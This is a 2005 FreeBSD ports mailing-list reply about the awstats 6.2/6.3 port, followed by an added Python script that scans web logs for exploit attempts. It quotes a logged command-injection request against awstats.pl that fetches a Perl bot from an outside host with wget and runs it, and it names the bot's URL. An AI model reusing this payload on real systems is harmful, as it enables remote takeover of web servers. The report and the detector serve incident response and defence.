From: Charlie Schluting
Date: Wed, 26 Jan 2005 19:53:21 -0800
To: ports@freebsd.org
Subject: Re: FreeBSD Port: awstats-6.2
Message-ID: <41F865B1.1030901@schluting.com>

On 1/26/2005 5:20 PM, Andrew J Caines wrote:
> FWIW, I think the original patch posted was lacking some changes in the
> pkg-plist which may or may not have been in the 6.2 update, when various
> bits moved around and the installed files changed.
>
> I've made another[1] for the 6.3 port[2]. This 6.3 port builds, installs,
> runs[3] and deinstalls cleanly. It doesn't specifically address any .jar
> install or other issues.

Indeed, the patch works (had to manually grab the tarball).

FWIW, yes, exploits are definitely in the wild. I grepped my logs for "wget" and saw one (successful) attempt:

/var/log/httpd-access.log:66.235.209.85 - - [26/Jan/2005:17:43:22 -0800] "GET /awstats/awstats.pl?configdir=%20%7Cecho%20;echo%20;cd%20/var/tmp;wget%20www.theplaza.co.uk/media/bot%20-O%20bot22;perl%20bot22;rm%20-f%20bot*;echo%20;echo%20%7C%20 HTTP/1.1" 200 588 "-" "LWP::Simple/5.65"

If you look at the code on:
http://www.theplaza.co.uk/media/bot
you'll see that it tries to start:

www 29943 101.6 0.5 4236 3504 ?? R 5:38PM 113:06.70 /usr/local/apache/bin/httpd -DSS1 (perl)

Fuckers :(

Thanks for the patch!

-Charlie
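The log check described in the message above, as an added example that is not part of the original post: instead of grepping for one tool name such as "wget", it URL-decodes the `configdir` parameter of every `awstats.pl` request and flags values containing shell metacharacters. The function name, the metacharacter set and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Apache common/combined format: host ident user [time] "METHOD target proto" status ...
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"[A-Z]+ (?P<target>\S+)[^"]*" (?P<status>\d{3}) '
)
# Characters a shell interprets and a configuration directory path never needs.
SHELL_META = re.compile(r'[|;`&<>]|\$\(')

# Constructed sample lines (documentation addresses, harmless payloads).
SAMPLE_LOG = [
    '192.0.2.10 - - [26/Jan/2005:17:40:01 -0800] '
    '"GET /awstats/awstats.pl?config=example HTTP/1.1" 200 10423 "-" "Mozilla/5.0"',
    '192.0.2.66 - - [26/Jan/2005:17:43:22 -0800] "GET /awstats/awstats.pl'
    '?configdir=%20%7Cecho%20;echo%20%7C%20 HTTP/1.1" 200 588 "-" "LWP::Simple/5.65"',
    '192.0.2.10 - - [26/Jan/2005:17:50:12 -0800] "GET /awstats/awstats.pl'
    '?configdir=/usr/local/etc/awstats HTTP/1.1" 200 9120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [26/Jan/2005:18:02:10 -0800] "GET /cgi-bin/awstats.pl'
    '?config=example&configdir=%7Cecho%7C HTTP/1.0" 404 291 "-" "-"',
]


def suspicious_awstats_hits(lines):
    """Return one dict per awstats.pl request whose configdir has shell metacharacters."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if not url.path.lower().endswith("/awstats.pl"):
            continue
        # Split on '&' by hand: the payload uses literal ';', which some
        # query-string parsers treat as a parameter separator.
        for param in url.query.split("&"):
            name, _, raw = param.partition("=")
            value = unquote_plus(raw)
            if name == "configdir" and SHELL_META.search(value):
                hits.append({"host": m["host"], "time": m["time"],
                             "status": int(m["status"]), "configdir": value})
    return hits


if __name__ == "__main__":
    for hit in suspicious_awstats_hits(SAMPLE_LOG):
        print(hit)
```

A 200 status only shows that the CGI answered the request; whether anything ran has to be confirmed on the host, for example by looking for unexpected processes owned by the web server user as in the message above.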